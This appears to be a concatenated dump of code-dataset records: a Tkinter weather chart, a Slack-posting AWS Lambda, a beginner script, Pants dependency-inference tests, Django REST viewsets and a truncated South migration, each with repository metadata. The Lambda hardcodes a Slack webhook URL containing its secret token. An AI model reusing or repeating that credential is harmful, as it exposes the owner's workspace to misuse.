self.chart.create_text(30, self.pointmax[len(self.pointmax) - 1][0], text=self.content.weathers[len(self.pointmax) - 1].maxdegree, fill='red');
for i in range(1, len(self.pointmin)):
self.chart.create_line(15, self.pointmin[i - 1][0], 20, self.pointmin[i - 1][0], fill='blue')
self.chart.create_text(10, self.pointmin[i - 1][0], text=self.content.weathers[i - 1].mindegree, fill='blue');
self.chart.create_line(self.pointmin[i - 1][1], self.pointmin[i - 1][0], self.pointmin[i][1], self.pointmin[i][0], fill='blue')
self.chart.create_line(15, self.pointmin[len(self.pointmin) - 1][0], 20, self.pointmin[len(self.pointmin) - 1][0], fill='blue')
self.chart.create_text(10, self.pointmin[len(self.pointmin) - 1][0], text=self.content.weathers[len(self.pointmin) - 1].mindegree, fill='blue');
def updateLineChart(self):
self.chart.delete(ALL)
self.initChart()
self.drawLineChart()
def GUI():
root = Tk(className='MyWeather')
root.resizable(width = False, height = False)
content = Content(root)
today = Today(root, content)
chart = LineChart(root, content)
top = Top(root, content, chart, today)
top.pack(fill=X)
today.pack(fill=X)
content.pack(fill=X)
chart.pack(fill=X)
root.mainloop()
| [
"chyiyaqing@gmail.com"
] | chyiyaqing@gmail.com |
69bf16c29bc8a1c8b61bf4115da050289a9cb9c5 | 1d51cca8970f466f88c97aa36f4b8cd76bd50583 | /bits_iot_button_pressed.py | 12769c0a231cc02cd971c13cd0f3115f9d5a405e | [] | no_license | hughgardiner/bits-iot-button | 1009051bc474b52e39eeda008088105b492cfcaf | 2155814bff46837ef9d2bb0debc3e3fe9c461762 | refs/heads/master | 2020-04-30T06:06:17.609488 | 2019-03-20T03:09:54 | 2019-03-20T03:09:54 | 176,642,512 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 236 | py | import requests
def lambda_handler(event, context):
request = requests.post(url = 'https://hooks.slack.com/services/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', json = {'text':'andon IOT Button Pressed'})
return request.text | [
"gardinerhugh6@gmail.com"
] | gardinerhugh6@gmail.com |
041350efe6b160a115e9e22c301c74a34ff53193 | 71257430418ed7410ddffb6df692a5e816eb53b7 | /61hunter.py | ed47aa6e3c043824bfe5d9b810408fd96bd965c2 | [] | no_license | aarthisandhiya/aarthi | 917283541b9aa133db5d50a3b68eda2a10c38af7 | 00b31831832ea573dfd886eb0001ad824325136d | refs/heads/master | 2020-04-15T05:10:42.585357 | 2019-07-21T13:57:58 | 2019-07-21T13:57:58 | 164,411,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 199 | py | a=int(input())
c=0
b=[int(a) for a in input().split()]
u,v=map(int,input().split())
for i in range(0,len(b)):
if b[i]==u:
while b[i]<int(v):
c=c+1
i=i+1
print(c)
| [
"noreply@github.com"
] | noreply@github.com |
6ab55be04331c76cccf1ce24dfa50f5dc47cd8ca | 4de8ee1711ab8b74f003217ecde93087db69b79c | /src/python/pants/backend/python/dependency_inference/rules_test.py | 903e2bb05e825e10dba91dab777479ebf72e7ae4 | [
"Apache-2.0"
] | permissive | TansyArron/pants | 45b19496a29aa962da22cb83b75e53d3c4ab291a | 20c8e11460ef9e7d9bfce12504f27729db7cc929 | refs/heads/master | 2022-12-09T01:34:39.535612 | 2022-12-05T20:47:31 | 2022-12-05T20:47:31 | 40,982,374 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,305 | py | # Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from textwrap import dedent
from typing import Iterable
import pytest
from pants.backend.python import target_types_rules
from pants.backend.python.dependency_inference.module_mapper import PythonModuleOwners
from pants.backend.python.dependency_inference.parse_python_dependencies import (
ParsedPythonImportInfo,
ParsedPythonImports,
)
from pants.backend.python.dependency_inference.rules import (
ConftestDependenciesInferenceFieldSet,
ImportOwnerStatus,
ImportResolveResult,
InferConftestDependencies,
InferInitDependencies,
InferPythonImportDependencies,
InitDependenciesInferenceFieldSet,
InitFilesInference,
PythonImportDependenciesInferenceFieldSet,
PythonInferSubsystem,
UnownedDependencyError,
UnownedDependencyUsage,
UnownedImportsPossibleOwners,
UnownedImportsPossibleOwnersRequest,
_find_other_owners_for_unowned_imports,
_get_imports_info,
import_rules,
infer_python_conftest_dependencies,
infer_python_init_dependencies,
)
from pants.backend.python.macros import python_requirements
from pants.backend.python.macros.python_requirements import PythonRequirementsTargetGenerator
from pants.backend.python.target_types import (
PythonRequirementTarget,
PythonSourcesGeneratorTarget,
PythonSourceTarget,
PythonTestsGeneratorTarget,
PythonTestUtilsGeneratorTarget,
)
from pants.backend.python.util_rules import ancestor_files
from pants.core.target_types import FilesGeneratorTarget, ResourcesGeneratorTarget
from pants.core.target_types import rules as core_target_types_rules
from pants.engine.addresses import Address
from pants.engine.internals.parametrize import Parametrize
from pants.engine.rules import SubsystemRule, rule
from pants.engine.target import ExplicitlyProvidedDependencies, InferredDependencies
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, QueryRule, RuleRunner, engine_error
from pants.util.ordered_set import FrozenOrderedSet
from pants.util.strutil import softwrap
def test_infer_python_imports(caplog) -> None:
rule_runner = RuleRunner(
rules=[
*import_rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
QueryRule(InferredDependencies, [InferPythonImportDependencies]),
],
target_types=[PythonSourcesGeneratorTarget, PythonRequirementTarget],
)
rule_runner.write_files(
{
"3rdparty/python/BUILD": dedent(
"""\
python_requirement(
name='Django',
requirements=['Django==1.21'],
)
"""
),
# If there's a `.py` and `.pyi` file for the same module, we should infer a dependency on both.
"src/python/str_import/subdir/f.py": "",
"src/python/str_import/subdir/f.pyi": "",
"src/python/str_import/subdir/BUILD": "python_sources()",
"src/python/util/dep.py": "",
"src/python/util/BUILD": "python_sources()",
"src/python/app.py": dedent(
"""\
import django
import unrecognized.module
from util.dep import Demo
from util import dep
"""
),
"src/python/f2.py": dedent(
"""\
import typing
# Import from another file in the same target.
from app import main
# Dynamic string import.
importlib.import_module('str_import.subdir.f')
"""
),
"src/python/BUILD": "python_sources()",
}
)
def run_dep_inference(
address: Address, *, enable_string_imports: bool = False
) -> InferredDependencies:
args = [
"--source-root-patterns=src/python",
"--python-infer-unowned-dependency-behavior=ignore",
]
if enable_string_imports:
args.append("--python-infer-string-imports")
rule_runner.set_options(args, env_inherit={"PATH", "PYENV_ROOT", "HOME"})
target = rule_runner.get_target(address)
return rule_runner.request(
InferredDependencies,
[
InferPythonImportDependencies(
PythonImportDependenciesInferenceFieldSet.create(target)
)
],
)
assert run_dep_inference(
Address("src/python", relative_file_path="app.py")
) == InferredDependencies(
[
Address("3rdparty/python", target_name="Django"),
Address("src/python/util", relative_file_path="dep.py"),
],
)
addr = Address("src/python", relative_file_path="f2.py")
assert run_dep_inference(addr) == InferredDependencies(
[Address("src/python", relative_file_path="app.py")]
)
assert run_dep_inference(addr, enable_string_imports=True) == InferredDependencies(
[
Address("src/python", relative_file_path="app.py"),
Address("src/python/str_import/subdir", relative_file_path="f.py"),
Address("src/python/str_import/subdir", relative_file_path="f.pyi"),
],
)
# Test handling of ambiguous imports. We should warn on the ambiguous dependency, but not warn
# on the disambiguated one and should infer a dep.
caplog.clear()
rule_runner.write_files(
{
"src/python/ambiguous/dep.py": "",
"src/python/ambiguous/disambiguated_via_ignores.py": "",
"src/python/ambiguous/main.py": (
"import ambiguous.dep\nimport ambiguous.disambiguated_via_ignores\n"
),
"src/python/ambiguous/BUILD": dedent(
"""\
python_sources(name='dep1', sources=['dep.py', 'disambiguated_via_ignores.py'])
python_sources(name='dep2', sources=['dep.py', 'disambiguated_via_ignores.py'])
python_sources(
name='main',
sources=['main.py'],
dependencies=['!./disambiguated_via_ignores.py:dep2'],
)
"""
),
}
)
assert run_dep_inference(
Address("src/python/ambiguous", target_name="main", relative_file_path="main.py")
) == InferredDependencies(
[
Address(
"src/python/ambiguous",
target_name="dep1",
relative_file_path="disambiguated_via_ignores.py",
)
],
)
assert len(caplog.records) == 1
assert "The target src/python/ambiguous/main.py:main imports `ambiguous.dep`" in caplog.text
assert "['src/python/ambiguous/dep.py:dep1', 'src/python/ambiguous/dep.py:dep2']" in caplog.text
assert "disambiguated_via_ignores.py" not in caplog.text
def test_infer_python_assets(caplog) -> None:
rule_runner = RuleRunner(
rules=[
*import_rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
QueryRule(InferredDependencies, [InferPythonImportDependencies]),
],
target_types=[
PythonSourcesGeneratorTarget,
PythonRequirementTarget,
ResourcesGeneratorTarget,
FilesGeneratorTarget,
],
)
rule_runner.write_files(
{
"src/python/data/BUILD": "resources(name='jsonfiles', sources=['*.json'])",
"src/python/data/db.json": "",
"src/python/data/db2.json": "",
"src/python/data/flavors.txt": "",
"configs/prod.txt": "",
"src/python/app.py": dedent(
"""\
pkgutil.get_data(__name__, "data/db.json")
pkgutil.get_data(__name__, "data/db2.json")
open("configs/prod.txt")
"""
),
"src/python/f.py": dedent(
"""\
idk_kinda_looks_resourcey = "data/db.json"
CustomResourceType("data/flavors.txt")
"""
),
"src/python/BUILD": dedent(
"""\
python_sources()
# Also test assets declared from parent dir
resources(
name="txtfiles",
sources=["data/*.txt"],
)
"""
),
"configs/BUILD": dedent(
"""\
files(
name="configs",
sources=["prod.txt"],
)
"""
),
}
)
def run_dep_inference(address: Address) -> InferredDependencies:
args = [
"--source-root-patterns=src/python",
"--python-infer-assets",
]
rule_runner.set_options(args, env_inherit={"PATH", "PYENV_ROOT", "HOME"})
target = rule_runner.get_target(address)
return rule_runner.request(
InferredDependencies,
[
InferPythonImportDependencies(
PythonImportDependenciesInferenceFieldSet.create(target)
)
],
)
assert run_dep_inference(
Address("src/python", relative_file_path="app.py")
) == InferredDependencies(
[
Address("src/python/data", target_name="jsonfiles", relative_file_path="db.json"),
Address("src/python/data", target_name="jsonfiles", relative_file_path="db2.json"),
Address("configs", target_name="configs", relative_file_path="prod.txt"),
],
)
assert run_dep_inference(
Address("src/python", relative_file_path="f.py")
) == InferredDependencies(
[
Address("src/python/data", target_name="jsonfiles", relative_file_path="db.json"),
Address("src/python", target_name="txtfiles", relative_file_path="data/flavors.txt"),
],
)
# Test handling of ambiguous assets. We should warn on the ambiguous dependency, but not warn
# on the disambiguated one and should infer a dep.
caplog.clear()
rule_runner.write_files(
{
"src/python/data/BUILD": dedent(
"""\
resources(name='jsonfiles', sources=['*.json'])
resources(name='also_jsonfiles', sources=['*.json'])
resources(name='txtfiles', sources=['*.txt'])
"""
),
"src/python/data/ambiguous.json": "",
"src/python/data/disambiguated_with_bang.json": "",
"src/python/app.py": dedent(
"""\
pkgutil.get_data(__name__, "data/ambiguous.json")
pkgutil.get_data(__name__, "data/disambiguated_with_bang.json")
"""
),
"src/python/BUILD": dedent(
"""\
python_sources(
name="main",
dependencies=['!./data/disambiguated_with_bang.json:also_jsonfiles'],
)
"""
),
# Both a resource relative to the module and file with conspicuously similar paths
"src/python/data/both_file_and_resource.txt": "",
"data/both_file_and_resource.txt": "",
"data/BUILD": "files(name='txtfiles', sources=['*.txt'])",
"src/python/assets_bag.py": "ImAPathType('data/both_file_and_resource.txt')",
}
)
assert run_dep_inference(
Address("src/python", target_name="main", relative_file_path="app.py")
) == InferredDependencies(
[
Address(
"src/python/data",
target_name="jsonfiles",
relative_file_path="disambiguated_with_bang.json",
),
],
)
assert len(caplog.records) == 1
assert "The target src/python/app.py:main uses `data/ambiguous.json`" in caplog.text
assert (
"['src/python/data/ambiguous.json:also_jsonfiles', 'src/python/data/ambiguous.json:jsonfiles']"
in caplog.text
)
assert "disambiguated_with_bang.py" not in caplog.text
caplog.clear()
assert run_dep_inference(
Address("src/python", target_name="main", relative_file_path="assets_bag.py")
) == InferredDependencies([])
assert len(caplog.records) == 1
assert (
"The target src/python/assets_bag.py:main uses `data/both_file_and_resource.txt`"
in caplog.text
)
assert (
"['data/both_file_and_resource.txt:txtfiles', 'src/python/data/both_file_and_resource.txt:txtfiles']"
in caplog.text
)
@pytest.mark.parametrize("behavior", InitFilesInference)
def test_infer_python_inits(behavior: InitFilesInference) -> None:
rule_runner = RuleRunner(
rules=[
*ancestor_files.rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
infer_python_init_dependencies,
SubsystemRule(PythonInferSubsystem),
QueryRule(InferredDependencies, (InferInitDependencies,)),
],
target_types=[PythonSourcesGeneratorTarget],
objects={"parametrize": Parametrize},
)
rule_runner.set_options(
[
f"--python-infer-init-files={behavior.value}",
"--python-resolves={'a': '', 'b': ''}",
"--python-default-resolve=a",
"--python-enable-resolves",
],
env_inherit=PYTHON_BOOTSTRAP_ENV,
)
rule_runner.write_files(
{
"src/python/root/__init__.py": "content",
"src/python/root/BUILD": "python_sources(resolve=parametrize('a', 'b'))",
"src/python/root/mid/__init__.py": "",
"src/python/root/mid/BUILD": "python_sources()",
"src/python/root/mid/leaf/__init__.py": "content",
"src/python/root/mid/leaf/f.py": "",
"src/python/root/mid/leaf/BUILD": "python_sources()",
"src/python/type_stub/__init__.pyi": "content",
"src/python/type_stub/foo.pyi": "",
"src/python/type_stub/BUILD": "python_sources()",
}
)
def check(address: Address, expected: list[Address]) -> None:
target = rule_runner.get_target(address)
result = rule_runner.request(
InferredDependencies,
[InferInitDependencies(InitDependenciesInferenceFieldSet.create(target))],
)
if behavior == InitFilesInference.never:
expected = []
assert result == InferredDependencies(expected)
check(
Address("src/python/root/mid/leaf", relative_file_path="f.py"),
[
Address(
"src/python/root", relative_file_path="__init__.py", parameters={"resolve": "a"}
),
*(
[]
if behavior is InitFilesInference.content_only
else [Address("src/python/root/mid", relative_file_path="__init__.py")]
),
Address("src/python/root/mid/leaf", relative_file_path="__init__.py"),
],
)
check(
Address("src/python/type_stub", relative_file_path="foo.pyi"),
[Address("src/python/type_stub", relative_file_path="__init__.pyi")],
)
def test_infer_python_conftests() -> None:
rule_runner = RuleRunner(
rules=[
*ancestor_files.rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
infer_python_conftest_dependencies,
SubsystemRule(PythonInferSubsystem),
QueryRule(InferredDependencies, (InferConftestDependencies,)),
],
target_types=[PythonTestsGeneratorTarget, PythonTestUtilsGeneratorTarget],
objects={"parametrize": Parametrize},
)
rule_runner.set_options(
[
"--source-root-patterns=src/python",
"--python-resolves={'a': '', 'b': ''}",
"--python-default-resolve=a",
"--python-enable-resolves",
],
env_inherit={"PATH", "PYENV_ROOT", "HOME"},
)
rule_runner.write_files(
{
"src/python/root/conftest.py": "",
"src/python/root/BUILD": "python_test_utils(resolve=parametrize('a', 'b'))",
"src/python/root/mid/conftest.py": "",
"src/python/root/mid/BUILD": "python_test_utils()",
"src/python/root/mid/leaf/conftest.py": "",
"src/python/root/mid/leaf/this_is_a_test.py": "",
"src/python/root/mid/leaf/BUILD": "python_test_utils()\npython_tests(name='tests')",
}
)
def run_dep_inference(address: Address) -> InferredDependencies:
target = rule_runner.get_target(address)
return rule_runner.request(
InferredDependencies,
[InferConftestDependencies(ConftestDependenciesInferenceFieldSet.create(target))],
)
assert run_dep_inference(
Address(
"src/python/root/mid/leaf", target_name="tests", relative_file_path="this_is_a_test.py"
)
) == InferredDependencies(
[
Address(
"src/python/root", relative_file_path="conftest.py", parameters={"resolve": "a"}
),
Address("src/python/root/mid", relative_file_path="conftest.py"),
Address("src/python/root/mid/leaf", relative_file_path="conftest.py"),
],
)
@pytest.fixture
def imports_rule_runner() -> RuleRunner:
return mk_imports_rule_runner([])
def mk_imports_rule_runner(more_rules: Iterable) -> RuleRunner:
return RuleRunner(
rules=[
*more_rules,
*import_rules(),
*target_types_rules.rules(),
*core_target_types_rules(),
*python_requirements.rules(),
QueryRule(InferredDependencies, [InferPythonImportDependencies]),
],
target_types=[
PythonSourceTarget,
PythonSourcesGeneratorTarget,
PythonRequirementTarget,
PythonRequirementsTargetGenerator,
],
objects={"parametrize": Parametrize},
)
def test_infer_python_strict(imports_rule_runner: RuleRunner, caplog) -> None:
imports_rule_runner.write_files(
{
"src/python/cheesey.py": dedent(
"""\
import venezuelan_beaver_cheese
"japanese.sage.derby"
"""
),
"src/python/BUILD": "python_sources()",
}
)
def run_dep_inference(unowned_dependency_behavior: str) -> InferredDependencies:
imports_rule_runner.set_options(
[
f"--python-infer-unowned-dependency-behavior={unowned_dependency_behavior}",
"--python-infer-string-imports",
],
env_inherit=PYTHON_BOOTSTRAP_ENV,
)
target = imports_rule_runner.get_target(
Address("src/python", relative_file_path="cheesey.py")
)
return imports_rule_runner.request(
InferredDependencies,
[
InferPythonImportDependencies(
PythonImportDependenciesInferenceFieldSet.create(target)
)
],
)
run_dep_inference("warning")
assert len(caplog.records) == 1
assert (
"cannot infer owners for the following imports in the target src/python/cheesey.py:"
in caplog.text
)
assert " * venezuelan_beaver_cheese (line: 1)" in caplog.text
assert "japanese.sage.derby" not in caplog.text
with engine_error(UnownedDependencyError, contains="src/python/cheesey.py"):
run_dep_inference("error")
caplog.clear()
# All modes should be fine if the module is explicitly declared as a requirement
imports_rule_runner.write_files(
{
"src/python/BUILD": dedent(
"""\
python_requirement(
name="venezuelan_beaver_cheese",
modules=["venezuelan_beaver_cheese"],
requirements=["venezuelan_beaver_cheese==1.0.0"],
)
python_sources(dependencies=[":venezuelan_beaver_cheese"])
"""
),
}
)
for mode in UnownedDependencyUsage:
run_dep_inference(mode.value)
assert not caplog.records
# All modes should be fine if the module is implictly found via requirements.txt
imports_rule_runner.write_files(
{
"src/python/requirements.txt": "venezuelan_beaver_cheese==1.0.0",
"src/python/BUILD": dedent(
"""\
python_requirements(name='reqs')
python_sources()
"""
),
}
)
for mode in UnownedDependencyUsage:
run_dep_inference(mode.value)
assert not caplog.records
# All modes should be fine if the module is owned by a first party
imports_rule_runner.write_files(
{
"src/python/venezuelan_beaver_cheese.py": "",
"src/python/BUILD": "python_sources()",
}
)
for mode in UnownedDependencyUsage:
run_dep_inference(mode.value)
assert not caplog.records
def test_infer_python_strict_multiple_resolves(imports_rule_runner: RuleRunner) -> None:
imports_rule_runner.write_files(
{
"project/base.py": "",
"project/utils.py": "",
"project/app.py": "import project.base\nimport project.utils",
"project/BUILD": dedent(
"""\
python_source(
name="base",
source="base.py",
resolve="a",
)
python_source(
name="utils",
source="utils.py",
resolve=parametrize("a", "b"),
)
python_source(
name="app",
source="app.py",
resolve="z",
)
"""
),
}
)
imports_rule_runner.set_options(
[
"--python-infer-unowned-dependency-behavior=error",
"--python-enable-resolves",
"--python-resolves={'a': '', 'b': '', 'z': ''}",
],
env_inherit=PYTHON_BOOTSTRAP_ENV,
)
tgt = imports_rule_runner.get_target(Address("project", target_name="app"))
expected_error = softwrap(
"""
These imports are not in the resolve used by the target (`z`), but they were present in
other resolves:
* project.base: 'a' from project:base
* project.utils: 'a' from project:utils@resolve=a, 'b' from project:utils@resolve=b
"""
)
with engine_error(UnownedDependencyError, contains=expected_error):
imports_rule_runner.request(
InferredDependencies,
[InferPythonImportDependencies(PythonImportDependenciesInferenceFieldSet.create(tgt))],
)
class TestCategoriseImportsInfo:
address = Address("sample/path")
import_cases = {
"unambiguous": (
ParsedPythonImportInfo(0, False),
PythonModuleOwners((Address("unambiguous.py"),)),
),
"unambiguous_with_pyi": (
ParsedPythonImportInfo(0, False),
PythonModuleOwners(
(
Address("unambiguous_with_pyi.py"),
Address("unambiguous_with_pyi.pyi"),
)
),
),
"ambiguous_disambiguatable": (
ParsedPythonImportInfo(0, False),
PythonModuleOwners(
tuple(),
(
Address("ambiguous_disambiguatable", target_name="good"),
Address("ambiguous_disambiguatable", target_name="bad"),
),
),
),
"ambiguous_terminal": (
ParsedPythonImportInfo(0, False),
PythonModuleOwners(
tuple(),
(
Address("ambiguous_disambiguatable", target_name="bad0"),
Address("ambiguous_disambiguatable", target_name="bad1"),
),
),
),
"json": (
ParsedPythonImportInfo(0, False),
PythonModuleOwners(tuple()),
), # unownable
"os.path": (
ParsedPythonImportInfo(0, False),
PythonModuleOwners(tuple()),
), # unownable, not root module
"weak_owned": (
ParsedPythonImportInfo(0, True),
PythonModuleOwners((Address("weak_owned.py"),)),
),
"weak_unowned": (
ParsedPythonImportInfo(0, True),
PythonModuleOwners(tuple()),
),
"unowned": (
ParsedPythonImportInfo(0, False),
PythonModuleOwners(tuple()),
),
}
def filter_case(self, case_name: str, cases=None):
cases = cases or self.import_cases
return {case_name: cases[case_name]}
def separate_owners_and_imports(
self,
imports_to_owners: dict[str, tuple[ParsedPythonImportInfo, PythonModuleOwners]],
) -> tuple[list[PythonModuleOwners], ParsedPythonImports]:
owners_per_import = [x[1] for x in imports_to_owners.values()]
parsed_imports = ParsedPythonImports({k: v[0] for k, v in imports_to_owners.items()})
return owners_per_import, parsed_imports
def do_test(self, case_name: str, expected_status: ImportOwnerStatus) -> ImportResolveResult:
owners_per_import, parsed_imports = self.separate_owners_and_imports(
self.filter_case(case_name)
)
resolve_result = _get_imports_info(
self.address,
owners_per_import,
parsed_imports,
ExplicitlyProvidedDependencies(
self.address,
FrozenOrderedSet(),
FrozenOrderedSet((Address("ambiguous_disambiguatable", target_name="bad"),)),
),
)
assert len(resolve_result) == 1 and case_name in resolve_result
resolved = resolve_result[case_name]
assert resolved.status == expected_status
return resolved
def test_unambiguous_imports(self, imports_rule_runner: RuleRunner) -> None:
case_name = "unambiguous"
resolved = self.do_test(case_name, ImportOwnerStatus.unambiguous)
assert resolved.address == self.import_cases[case_name][1].unambiguous
def test_unambiguous_with_pyi(self, imports_rule_runner: RuleRunner) -> None:
case_name = "unambiguous_with_pyi"
resolved = self.do_test(case_name, ImportOwnerStatus.unambiguous)
assert resolved.address == self.import_cases[case_name][1].unambiguous
def test_unownable_root(self, imports_rule_runner: RuleRunner) -> None:
case_name = "json"
self.do_test(case_name, ImportOwnerStatus.unownable)
def test_unownable_nonroot(self, imports_rule_runner: RuleRunner) -> None:
case_name = "os.path"
self.do_test(case_name, ImportOwnerStatus.unownable)
def test_weak_owned(self, imports_rule_runner: RuleRunner) -> None:
case_name = "weak_owned"
resolved = self.do_test(case_name, ImportOwnerStatus.unambiguous)
assert resolved.address == self.import_cases[case_name][1].unambiguous
def test_weak_unowned(self, imports_rule_runner: RuleRunner) -> None:
case_name = "weak_unowned"
resolved = self.do_test(case_name, ImportOwnerStatus.weak_ignore)
assert resolved.address == tuple()
def test_unowned(self, imports_rule_runner: RuleRunner) -> None:
case_name = "unowned"
resolved = self.do_test(case_name, ImportOwnerStatus.unowned)
assert resolved.address == tuple()
def test_ambiguous_disambiguatable(self):
case_name = "ambiguous_disambiguatable"
resolved = self.do_test(case_name, ImportOwnerStatus.disambiguated)
assert resolved.address == (self.import_cases[case_name][1].ambiguous[0],)
def test_ambiguous_not_disambiguatable(self):
case_name = "ambiguous_terminal"
resolved = self.do_test(case_name, ImportOwnerStatus.unowned)
assert resolved.address == ()
class TestFindOtherOwners:
missing_import_name = "missing"
other_resolve = "other-resolve"
other_other_resolve = "other-other-resolve"
@staticmethod
@rule
async def run_rule(
req: UnownedImportsPossibleOwnersRequest,
) -> UnownedImportsPossibleOwners:
return await _find_other_owners_for_unowned_imports(req)
@pytest.fixture
def _imports_rule_runner(self):
return mk_imports_rule_runner(
[
self.run_rule,
QueryRule(UnownedImportsPossibleOwners, [UnownedImportsPossibleOwnersRequest]),
]
)
def do_test(self, imports_rule_runner: RuleRunner):
resolves = {"python-default": "", self.other_resolve: "", self.other_other_resolve: ""}
imports_rule_runner.set_options(
[
"--python-enable-resolves",
f"--python-resolves={resolves}",
]
)
imports_rule_runner.write_files(
{
"project/cheesey.py": dedent(
f"""\
import other.{self.missing_import_name}
"""
),
"project/BUILD": "python_sources()",
}
)
return imports_rule_runner.request(
UnownedImportsPossibleOwners,
[
UnownedImportsPossibleOwnersRequest(
frozenset((f"other.{self.missing_import_name}",)), "original_resolve"
)
],
)
def test_no_other_owners_found(self, _imports_rule_runner):
r = self.do_test(_imports_rule_runner)
assert not r.value
def test_other_owners_found_in_single_resolve(self, _imports_rule_runner: RuleRunner):
_imports_rule_runner.write_files(
{
"other/BUILD": dedent(
f"""\
python_source(
name="{self.missing_import_name}",
source="{self.missing_import_name}.py",
resolve="{self.other_resolve}",
)
"""
),
f"other/{self.missing_import_name}.py": "",
}
)
r = self.do_test(_imports_rule_runner)
as_module = f"other.{self.missing_import_name}"
assert as_module in r.value
assert r.value[as_module] == [
(
Address("other", target_name=self.missing_import_name),
self.other_resolve,
)
]
def test_other_owners_found_in_multiple_resolves(self, _imports_rule_runner: RuleRunner):
_imports_rule_runner.write_files(
{
"other/BUILD": dedent(
f"""\
python_source(
name="{self.missing_import_name}",
source="{self.missing_import_name}.py",
resolve=parametrize("{self.other_resolve}", "{self.other_other_resolve}"),
)
"""
),
f"other/{self.missing_import_name}.py": "",
}
)
r = self.do_test(_imports_rule_runner)
as_module = f"other.{self.missing_import_name}"
assert as_module in r.value
assert r.value[as_module] == [
(
Address(
"other",
target_name=self.missing_import_name,
parameters={"resolve": resolve},
),
resolve,
)
for resolve in (self.other_other_resolve, self.other_resolve)
]
| [
"noreply@github.com"
] | noreply@github.com |
a3f81763f9e1a8d13b8b807682abb096f73ffb0f | 1351256bdbd6d98fa6383a41f8db317ded419c05 | /apps/catalog/api/v1/views.py | bb1f9d8b5d7ba46dd395742735ee2d37dd1d7651 | [] | no_license | medinan/test | 64b0eb7fa593dc2e5fac14e8b09640d760ffc30e | 350fcaf141d3611d80368279799b3fb8d1136304 | refs/heads/master | 2023-09-05T05:50:07.117190 | 2021-10-25T22:10:12 | 2021-10-25T22:10:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,218 | py | from django_filters import rest_framework as filters
from rest_framework import viewsets
from apps.catalog.api.v1.filters import (
CategoryFilterSet,
BrandFilterSet,
ProductFilterSet,
)
from apps.catalog.api.v1.serializers import (
BrandSerializer,
CategorySerializer,
ProductSerializer,
ProductReadOnlySerializer,
)
from apps.catalog.models import Category, Brand, Product
from apps.events_tracker.tasks import ProductViewEventTrackingTask
from utils.restframework import permissions
class CategoryViewSet(viewsets.ModelViewSet):
"""
Categories view set
list: Returns a list of categories.
this is visible to all users.
retrieve: Returns a detail category.
this is visible to all users.
create: Create a category.
this is enabled only to admin user.
delete: delete a category.
this is enabled only to admin user.
update: update a category.
this is enabled only to admin user.
partial_update: partial update a category.
this is enabled only to admin user.
"""
queryset = Category.objects.all()
serializer_class = CategorySerializer
permission_classes = (permissions.ReadOnlyOrUserStaff,)
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = CategoryFilterSet
class BrandViewSet(viewsets.ModelViewSet):
"""
Brands view set
list: Returns a list of brands.
this is visible to all users.
retrieve: Returns a detail brands.
this is visible to all users.
create: Create a brand.
this is enabled only to admin user.
delete: delete a brand.
this is enabled only to admin user.
update: update a brand.
this is enabled only to admin user.
partial_update: partial update a brand.
this is enabled only to admin user.
"""
queryset = Brand.objects.all()
serializer_class = BrandSerializer
permission_classes = (permissions.ReadOnlyOrUserStaff,)
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = BrandFilterSet
class ProductViewSet(viewsets.ModelViewSet):
"""
Products viewset
list: Returns a list of Products.
this is visible to all users.
retrieve: Returns a detail Product.
this is visible to all users.
create: Create a Product.
this is enabled only to admin user.
delete: delete a Product.
this is enabled only to admin user.
update: update a Product.
this is enabled only to admin user.
partial_update: partial update a Product.
this is enabled only to admin user.
"""
queryset = Product.objects.all()
serializer_class = ProductSerializer
permission_classes = (permissions.ReadOnlyOrUserStaff,)
filter_backends = (filters.DjangoFilterBackend,)
filterset_class = ProductFilterSet
def get_serializer_class(self):
if self.action == "list":
return ProductReadOnlySerializer
return super().get_serializer_class()
def retrieve(self, request, *args, **kwargs):
product_instance = self.get_object()
ProductViewEventTrackingTask().delay(product_instance.pk)
return super(ProductViewSet, self).retrieve(request, *args, **kwargs)
| [
"noreply@github.com"
] | noreply@github.com |
3ebb0f00c40798b1ba5e4fb96bbb2223a3c119af | 8cc0a129738ef3b23d678c35cd9e118054990b9a | /calo_social/calo_social/friends/migrations/0003_auto__del_field_relationship_prueba_south.py | dd4485668e0e0e2aacc1109a66f9b706c62c0a72 | [] | no_license | adahlquist89/calo | 74ac41dc9af72fb32dcccbe24e76410276acbcb2 | 686c529e32221251383a612694ba254f84a28061 | refs/heads/master | 2021-01-10T20:10:45.997181 | 2013-09-09T20:12:14 | 2013-09-09T20:12:14 | 12,094,151 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,306 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Relationship.prueba_south'
db.delete_column(u'friends_relationship', 'prueba_south')
def backwards(self, orm):
# Adding field 'Relationship.prueba_south'
db.add_column(u'friends_relationship', 'prueba_south',
self.gf('django.db.models.fields.BooleanField')(default=False),
keep_default=False)
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
